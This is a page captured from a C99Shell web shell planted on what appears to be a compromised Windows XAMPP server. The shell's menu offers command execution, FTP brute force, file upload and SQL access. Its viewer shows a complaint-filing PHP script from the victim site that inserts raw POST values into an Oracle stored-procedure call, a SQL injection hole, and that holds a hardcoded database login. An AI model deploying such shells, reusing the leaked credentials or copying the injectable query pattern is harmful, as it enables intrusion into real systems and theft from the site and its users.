!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\phpold\quejas2006\   drwxrwxrwx
Free 4.97 GB of 239.26 GB (2.08%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     procesaReclamo.php (1.05 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<? 
if ($_SESSION['resultado']) {
echo "IR AL INICIO";
}else{
session_start();
$ins1=$_POST['ins1'];
$ins2=$_POST['ins2'];
$ins3=$_POST['ins3'];
$ins4=$_POST['ins4'];
$sqlstr3 = "CALL COR.COR_PK_RADICACION.PR_INSERTA_RECLAMO ('$ins1', '$ins2', '$ins4', '$ins3', :valida_insert, :un_error)";
$valida_insert = "";
$un_error = ""; ?>
<? 
$c13 = OciLogon("QUEJOSO","QUEJOSO","DAMASIA");
$insertafinal = ociparse($c13, $sqlstr3);
// http://phpbuilder.com/manual/en/function.oci-bind-by-name.php
oci_bind_by_name($insertafinal, ":valida_insert", $valida_insert, 32);
oci_bind_by_name($insertafinal, ":un_error", $un_error, 32);
OCIExecute($insertafinal);
if ($valida_insert=="NO_DATA"){
$resultado="Ha ocurrido un error durante la inserción de su reclamo, por favor intente en unos minutos";
}else{
$resultado="<span class='Titportada'>Su reclamo ha sido radicado de manera exitosa, para efectos de seguimiento el número es <strong>".$valida_insert."</strong></span><br><br>";
}
$_SESSION['resultado']=$resultado;
header("location: tercera.php");
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--